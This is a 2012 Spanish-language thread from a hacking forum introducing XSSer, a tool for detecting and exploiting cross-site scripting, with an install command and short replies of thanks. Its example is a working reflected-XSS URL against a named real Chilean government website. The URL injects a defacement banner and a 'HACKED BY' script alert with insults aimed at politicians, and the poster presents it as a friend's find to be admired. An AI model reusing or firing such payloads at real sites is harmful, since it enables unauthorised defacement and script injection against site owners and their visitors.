Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: xc0d3 en Junio 01, 2012, 11:20:48 AM

Título: XSSer: automatic tool for pentesting XSS attacks
Publicado por: xc0d3 en Junio 01, 2012, 11:20:48 AM

XSSer es una  herramienta de prueba  que automatiza el proceso de detección y explotación de inyecciones XSS contra diferentes aplicaciones.

XSS Es un tipo de inseguridad informática típico de las aplicaciones Web,
que permite a una tercera parte inyectar código JavaScript en páginas web vistas por el usuario.

Instalacion

apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip en bt ya esta instalada





EJEMPLO

xss descubierto por mi amigo Crackx

http://www.senadorvirtual.cl/dgeneral.php?ideleg&idusuario=%22%3E%3Ch1%3EFUCK+POLITICOS+KULIAOS+0wn3d+Team%3C%2Fh1%3E%3Cscript%3Ealert%28%22HACKED+BY+Crackx+FUCK+POLITICOS%22%29%3C%2Fscript%3E


mas Info ->http://xsser.sourceforge.net/

Título: Re:xsser
Publicado por: arthusu en Junio 01, 2012, 11:52:59 AM
Gracias por el programa el otra ves lo mire ahora vere como usarlo ;) :D
Título: Re:XSSer: automatic tool for pentesting XSS attacks
Publicado por: Aryenal.Bt en Junio 25, 2012, 04:47:49 AM
Gracias por tu aporte.